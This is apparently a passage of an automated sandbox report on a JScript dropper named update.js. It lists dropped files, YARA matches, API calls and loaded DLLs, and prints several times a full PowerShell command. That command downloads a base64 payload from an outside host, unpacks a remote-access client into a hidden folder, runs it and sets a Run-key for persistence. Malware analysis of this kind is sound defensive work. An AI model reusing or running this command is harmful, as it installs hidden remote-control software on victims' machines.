Source: wscript.exe, 00000000.00000003.1234026826.000002BB03AB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1367815908.000002BB0934F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1492692788.000002BB03AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1357625145.000002BB091D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1419923881.000002BB039EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.1425244635.000002B2D3321000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
Source: wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1357625145.000002BB091D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1396552350.000002BB06742000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.1439411024.000002B2CFE05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googleapis.com
Source: wscript.exe, 00000000.00000003.1237831355.000002BB00596000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googleapis.comW
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | HTTPS traffic detected: 79.141.163.131:443 -> 192.168.2.16:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.141.163.131:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.141.163.131:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 79.141.163.131:443 -> 192.168.2.16:49710 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard | 13_2_1101FC20
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_110335A0 GetClipboardFormatNameA,SetClipboardData | 13_2_110335A0
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard | 13_2_1101FC20
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_11033320 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock | 13_2_11033320
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_110077A0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor | 13_2_110077A0
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState | 13_2_11114590
Source: Yara match | File source: 13.2.client32.exe.111b8c68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICL32.DLL, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA | 13_2_111165C0

System Summary

                                Source: amsi64_3528.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Source: sslproxydump.pcap, type: PCAPMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Source: Process Memory Space: wscript.exe PID: 3528, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\pcicapi.dllJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11113190: GetKeyState,DeviceIoControl,keybd_event,13_2_11113190
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1115EA00 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,13_2_1115EA00
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,13_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,13_2_1102DD21
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC86D250010_2_00007FFEC86D2500
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC86D18D510_2_00007FFEC86D18D5
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC86D221210_2_00007FFEC86D2212
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC86D9E5310_2_00007FFEC86D9E53
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC8C7704A10_2_00007FFEC8C7704A
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1107368013_2_11073680
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11029BB013_2_11029BB0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_110627B013_2_110627B0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_110336D013_2_110336D0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1105180013_2_11051800
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1115F84013_2_1115F840
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1102BD4013_2_1102BD40
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1101BCD013_2_1101BCD0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11087F5013_2_11087F50
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11045E7013_2_11045E70
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1101C11013_2_1101C110
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_111640E013_2_111640E0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1116834513_2_11168345
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_111265B013_2_111265B0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1107043013_2_11070430
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1108074013_2_11080740
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1100892B13_2_1100892B
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\HHIAHYOW-5\HTCTL32.DLL 3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICHEK.DLL 956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeProcess token adjusted: SecurityJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: String function: 11161299 appears 36 times
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: String function: 11027F40 appears 47 times
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: String function: 11164ED0 appears 32 times
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: String function: 11147060 appears 545 times
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: String function: 1105E820 appears 271 times
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: String function: 11081E70 appears 46 times
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: String function: 11029A70 appears 888 times
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: String function: 1116FED0 appears 35 times
                                Source: update.jsInitial sample: Strings found which are bigger than 50
                                Source: amsi64_3528.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: sslproxydump.pcap, type: PCAPMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: Process Memory Space: wscript.exe PID: 3528, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: classification engineClassification label: mal100.rans.troj.expl.evad.winJS@8/29@2/3
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1105A760 GetLastError,FormatMessageA,LocalFree,13_2_1105A760
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,13_2_1109D860
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1109D8F0 AdjustTokenPrivileges,CloseHandle,13_2_1109D8F0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11116880 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,13_2_11116880
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11089430 FindResourceA,LoadResource,LockResource,13_2_11089430
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,13_2_11128B10
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6636:120:WilError_03
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngciucte.i2j.ps1Jump to behavior
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js"
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\update.js"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\update.js"
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe "C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe "C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe" Jump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ntasn1.dll
